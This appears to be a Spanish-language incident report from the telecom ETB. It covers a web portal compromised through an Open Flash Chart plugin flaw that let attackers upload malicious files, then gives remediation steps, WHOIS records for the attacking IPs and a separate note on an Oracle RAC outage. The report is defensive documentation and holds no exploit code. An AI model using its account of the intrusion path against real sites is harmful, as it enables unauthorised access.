A partir de la investigación se encontró que la modificación de los archivos fue posible a través de una vulnerabilidad de un complemento llamado Open Flash Chart, con el cual se procedió a crear un archivo que permitió el ingreso al sitio y por ende que el atacante haya podido subir archivos maliciosos a este.El complemento Open Flash Chart se encuentra instalado por solicitud de SNR y dando cumplimiento a lo requerido por los manuales de GEL en cuanto a información continúa hacia los ciudadanosDe acuerdo a las validaciones realizadas y ya que se cuenta con la última versión del complemento Open Flash Chart, se realizo el bloqueo de este subsanando la vulnerabilidad presentada y se procede a realizar la búsqueda de un parche de seguridad que blinde a dicho componente.Se recomienda a SNR la implementación de un control de acceso y subida de información al portal web por parte de sus Gestores con el fin de contar con un histórico de todos estos archivos permitiendo con esto la instalación de un software antivirus, (se realizaron pruebas con el antivirus ClamAV logrando la detección y erradicación de archivos maliciosos), el cual escaneara cada hora los archivos creados en esta para que en caso de explotarse una vulnerabilidad y que el atacante suba un archivo malicioso al servidor, este pueda ser detectado y notificado, y de esta manera se puedan tomar acciones de manera inmediata.
1. ANEXO 1. INFORMACIÓN DE LAS DIRECCIONES IP RELACIONADAS CON EL ATAQUE
118.97.212.185
% APNIC found the following authoritative answer from: whois.apnic.net
% [whois.apnic.net]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
% Information related to '118.97.208.0 - 118.97.223.255'
inetnum: 118.97.208.0 - 118.97.223.255
netname: TLKM_NAS_AST_CUSTOMER
country: ID
descr: PT TELKOM INDONESIA
descr: Menara Multimedia Lt. 7
descr: Jl. Kebonsirih No.12
descr: JAKARTA
admin-c: AR165-AP
tech-c: HM444-AP
status: ASSIGNED NON-PORTABLE
Bogotá, Colombia Ver 4.0 04-08GARS
mnt-by: MAINT-TELKOMNET
mnt-irt: IRT-IDTELKOM-ID
changed: [email protected] 20101202
source: APNIC
irt: IRT-IDTELKOM-ID
address: PT. TELKOM INDONESIA
address: Menara Multimedia Lt. 7
address: Jl. Kebon sirih No.12
address: JAKARTA
e-mail: [email protected]
abuse-mailbox: [email protected]
admin-c: DF99-AP
tech-c: AR165-AP
mnt-by: MAINT-TELKOMNET
changed: [email protected] 20120420
changed: [email protected] 20120420
source: APNIC
role: PT Telkom Indonesia APNIC Resources Management
address: PT. TELKOM INDONESIA
address: Menara Multimedia Lt. 7
address: Jl. Kebonsirih No.12
address: JAKARTA
country: ID
phone: +62-21-3860500
fax-no: +62-21-3861215
e-mail: [email protected]
admin-c: HM444-AP
Bogotá, Colombia Ver 4.0 04-08GARS
tech-c: HM444-AP
nic-hdl: AR165-AP
notify: [email protected]
mnt-by: MAINT-TELKOMNET
changed: [email protected] 20060105
source: APNIC
person: PT Telkom Indonesia Hostmaster
nic-hdl: HM444-AP
e-mail: [email protected]
address: PT. TELKOM INDONESIA
address: Menara Multimedia Lt. 7
address: Jl. Kebonsirih No.12
address: JAKARTA
phone: +62-21-3860500
fax-no: +62-21-3861215
country: ID
notify: [email protected]
mnt-by: MAINT-TELKOMNET
changed: [email protected] 20060105
source: APNIC
% Information related to '118.97.208.0/20AS17974'
route: 118.97.208.0/20
descr: PT. TELKOM INDONESIA
descr: Menara Multimedia Lt. 7
descr: Jln. Kebonsirih No.12
descr: JAKARTA
country: ID
Bogotá, Colombia Ver 4.0 04-08GARS
origin: AS17974
mnt-by: MAINT-TELKOMNET
changed: [email protected] 20130612
source: APNIC
% This query was served by the APNIC Whois Service version 1.68 (UNDEFINED)
77.245.151.239
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf
% Note: this output has been filtered.
% To receive output for a database update, use the "-B" flag.
% Information related to '77.245.144.0 - 77.245.159.255'
inetnum: 77.245.144.0 - 77.245.159.255netname: TR-NIOBE-20070427descr: Niobe Bilisim Teknolojileri Yazilim San. Tic. Ltd. Sti.country: USorg: ORG-NB14-RIPEadmin-c: CY77-RIPEtech-c: FB3777-RIPEstatus: ALLOCATED PAmnt-by: RIPE-NCC-HM-MNTmnt-lower: NIOBE-MNTmnt-routes: NIOBE-MNTsource: RIPE #Filtered
organisation: ORG-NB14-RIPEorg-name: Niobe Bilisim Teknolojileri Yazilim San. Tic. Ltd. Sti.org-type: LIRphone: +13022950953fax-no: +13022950953admin-c: CY77-RIPEadmin-c: FB3777-RIPEmnt-ref: NIOBE-MNT
Bogotá, Colombia Ver 4.0 04-08GARS
mnt-ref: RIPE-NCC-HM-MNTmnt-by: RIPE-NCC-HM-MNTsource: RIPE #Filteredaddress: Niobe Hosting LLCaddress: Fatih BIBEROGLUaddress: 501 Silverside Road ste 105address: 19809 Wilmington DEaddress: UNITED STATES
person: Cuneyt Yagizorg: ORG-NB14-RIPEaddress: 501 Silverside Road ste 105address: Wilmington DE 19809address: USAmnt-by: NIOBE-MNTphone: +1-3022950953remarks: ###################################remarks: Abuse & intrusion reports shouldremarks: be sent to: [email protected]: ###################################nic-hdl: CY77-RIPEsource: RIPE #Filtered
person: Fatih BIBEROGLUorg: ORG-NB14-RIPEaddress: 501 Silverside Rd Ste 105address: Wilmington DE 19809 USAmnt-by: NIOBE-MNTphone: +1 302-2950953remarks: ###################################remarks: Abuse and intrusion reports shouldremarks: be sent to: [email protected]: ###################################nic-hdl: FB3777-RIPEsource: RIPE #Filtered
% Information related to '77.245.144.0/20AS42868'
route: 77.245.144.0/20descr: CMBMorigin: AS42868mnt-by: NIOBE-MNTsource: RIPE #Filtered
Bogotá, Colombia Ver 4.0 04-08GARS
% This query was served by the RIPE Database Query Service version 1.68.1 (WHOIS3)
91.221.0.124
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf
% Note: this output has been filtered.
% To receive output for a database update, use the "-B" flag.
% Information related to '91.221.0.0 - 91.221.1.255'
inetnum: 91.221.0.0 - 91.221.1.255netname: E-MORDOVIAdescr: SUE of RM "SPC of Informatization and New Technologies"country: RUorg: ORG-SIaN1-RIPEadmin-c: AI1814-RIPEtech-c: AI1814-RIPEstatus: ASSIGNED PImnt-by: RIPE-NCC-END-MNTmnt-lower: RIPE-NCC-END-MNTmnt-by: MNT-INTRMmnt-routes: MNT-INTRMmnt-domains: MNT-INTRMsource: RIPE #Filtered
organisation: ORG-SIaN1-RIPEorg-name: SUE of RM "SPC of Informatization and New Technologies"org-type: OTHERaddress: Communist str. 13address: Saransk, 430000, Russiamnt-ref: MNT-INTRMmnt-by: MNT-INTRMsource: RIPE #Filtered
person: Alexander Ilyinaddress: Communist str. 33address: Saransk, Russia
Bogotá, Colombia Ver 4.0 04-08GARS
phone: +7 8342 242276nic-hdl: AI1814-RIPEsource: RIPE #Filtered
% Information related to '91.221.0.0/23AS51635'
route: 91.221.0.0/23descr: route objectorigin: AS51635mnt-by: MNT-INTRMsource: RIPE #Filtered
% This query was served by the RIPE Database Query Service version 1.68.1 (WHOIS3)188.40.17.97
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf
% Note: this output has been filtered.
% To receive output for a database update, use the "-B" flag.
% Information related to '188.40.17.97 - 188.40.17.97'
% Abuse contact for '188.40.17.97 - 188.40.17.97' is '[email protected]'
inetnum: 188.40.17.97 - 188.40.17.97netname: GOBIT-SRLdescr: Gobit S.r.l.country: DEadmin-c: EP4807-RIPEtech-c: EP4807-RIPEstatus: ASSIGNED PAmnt-by: HOS-GUNsource: RIPE #Filtered
person: Enrica Paoletti
Bogotá, Colombia Ver 4.0 04-08GARS
address: Gobit S.r.l.address: V.le Lombardia n.30address: 53042 Chianciano Terme (Siena)address: ITALYphone: +39057863007fax-no: +39057863007nic-hdl: EP4807-RIPEmnt-by: HOS-GUNsource: RIPE #Filtered
% Information related to '188.40.0.0/16AS24940'
route: 188.40.0.0/16descr: HETZNER-RZ-FKS-BLK1origin: AS24940org: ORG-HOA1-RIPEmnt-by: HOS-GUNsource: RIPE #Filtered
organisation: ORG-HOA1-RIPEorg-name: Hetzner Online AGorg-type: LIRaddress: Hetzner Online AGaddress: Attn. Martin Hetzneraddress: Stuttgarter Str. 1address: 91710address: Gunzenhausenaddress: GERMANYphone: +49 9831 610061fax-no: +49 9831 610062admin-c: TF2013-RIPEadmin-c: MF1400-RIPEadmin-c: GM834-RIPEadmin-c: HOAC1-RIPEadmin-c: MH375-RIPEadmin-c: SK8441-RIPEadmin-c: SK2374-RIPEmnt-ref: HOS-GUNmnt-ref: RIPE-NCC-HM-MNTmnt-by: RIPE-NCC-HM-MNTabuse-c: HOAC1-RIPEsource: RIPE #Filtered
% This query was served by the RIPE Database Query Service version 1.68.1 (WHOIS3)
Bogotá, Colombia Ver 4.0 04-08GARS
Se realizaron depuraciones debido a los bloqueos y encolamiento generado por los procesos mencionados, luego de esto fue necesario realizar labores adicionales sobre el nodo 2 con el fin de solucionar el inconveniente presentado y que no permitía recibir sesiones de la aplicaciones, luego de ser solucionado el aplicativo funciono correctamente.
ACCIONES DE MEJORA
Es necesario realizar pruebas en ambiente controlado con el soporte de los fabricantes ya que se detecto que al presentarse un evento sobre alguno de los tres nodos de Base de Datos que impacte su funcionamiento normal se presenta desconexión total de la aplicación presentándose afectación total del servicio, lo cual no es un comportamiento normal ya que se cuenta con un RAC de Oracle.
Estado Actual: Resuelto
Evento Atendido por: ETB - INTEK
VoBo Ingeniero: Luis E. Muñoz.
Disponibilidad:
En la Cultura ETB, ¡Entendemos las necesidades de nuestros clientes y les ofrecemos soluciones integrales, buscando relaciones de largo plazo!
